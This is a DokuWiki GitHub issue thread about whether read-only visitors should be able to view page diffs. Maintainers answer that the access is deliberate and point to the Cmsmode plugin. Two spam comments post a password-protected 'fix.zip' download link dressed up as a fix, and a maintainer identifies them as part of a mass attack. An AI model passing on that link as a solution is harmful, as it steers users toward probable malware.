### ISSUE TITLE
Block unauthorized access to diff pages

### ISSUE THREAD

**Issue by zounp** [dokuwiki/dokuwiki#4317]
### The problem

I noticed in the access.log that there is external access to diff pages like [23/Apr/2024:00:33:33 +0200] "GET /_media/wiki/logo.png HTTP/2.0" 200 256 "https://domain.tldl/pagename?do=diff&rev=1594210543&difftype=sidebyside" "Mozilla/5.0 ( .......
I think there should be a way for unauthorized access to be blocked.

### Version of DokuWiki

Release 2024-02-06b "Kaos"

### PHP Version

8.3.10

### Webserver and version of webserver

Apache 2.4.62

### Browser and version of browser, operating system running browser

Firefox 192.0.2

### Relevant logs and/or error messages

```text
[23/Apr/2024:00:33:33 +0200] "GET /_media/wiki/logo.png HTTP/2.0" 200 256 "https://domain.tldl/pagename?do=diff&rev=1594210543&difftype=sidebyside" "Mozilla/5.0 ( .......
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zounp** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Is this spam?

**Comment by splitbrain** [comment]
> Is this spam / phishing / a backdoor?

Yes it seems github is currently suffering from a massive attack. These auto comments are all over the place right now.

**Comment by splitbrain** [comment]
What are your ACLs for the affected media namespaces like?

**Comment by zounp** [comment]
Read for everyone:
Page/Namespace	User/Group	Permissions1)	Delete
*	@ALL	⚫ None 🔵 Read

**Comment by splitbrain** [comment]
> Read for everyone

Then I fail to see what you are reporting.

**Comment by zounp** [comment]
I am surprised that there is free access to diff pages. I expected they are only visible for users who are logged in since it makes no sense for visitors with only read access to be able to view them and I think it is none of there business what the change history of a page is. Like in
https://www.dokuwiki.org/donate?rev=1652346477&do=diff 
or
https://www.dokuwiki.org/extensions?do=diff&rev=1723733308

The 'button' can be turned of in the configuration manager via disableactions Disable DokuWiki actions. But that does not block access for visitors who are not logged and visitors who are logged in but do not have the rights (which can not be set at this moment as far as I know and might not be needed at all).

**Comment by Michaelsy** [comment]
>  I expected they are only visible for users...

What you are describing does not belong in the "bug" category, but is referred to as "unexpected behaviour". There are different opinions as to what behaviour is to be expected.

The [Cmsmode plugin](https://www.dokuwiki.org/plugin:cmsmode) can be used to block the diff display, but only for users who are not logged in.

\- Michael Sy.

**Comment by zounp** [comment]
Indeed, that solve the issue. Thanks.

**Comment by Michaelsy** [comment]
> Although I would expect the cmsmode functionality to be standard incorporated in Dokuwiki.

Of the approximately 45,000 thousand DokuWiki installations for which corresponding data is available, 30 have the Cmsmode plugin installed. That is 0.067%. There would be a lot more to write on this topic, but I'll leave that out here.

\- Michael Sy.

**Comment by zounp** [comment]
Indeed, that is not much. Maybe because users, like me, are not aware of the issue. It took me some 10 years to become aware. If it were in the Configuration Manager settings I would have blocked most of the items in cmsmod a long time ago.

**Comment by Michaelsy** [comment]
> If it were in the Configuration Manager settings I would have blocked most of the items in cmsmod a long time ago.

Ok, so we will integrate the more than 1400 plugins into the Configuration Manager so that everyone can find what they are interested in... 👍

\- Michael Sy.

**Comment by Klap-in** [comment]
I prefer assess to the diff page for read-only readers, as it give them the possibility to understand how current content has evolved to current state. I assume certain openness about the info on public wiki pages, an assumption made more often in the development of the wiki. But of course, plugins as cmsmode can help you if you have a different philosophy.
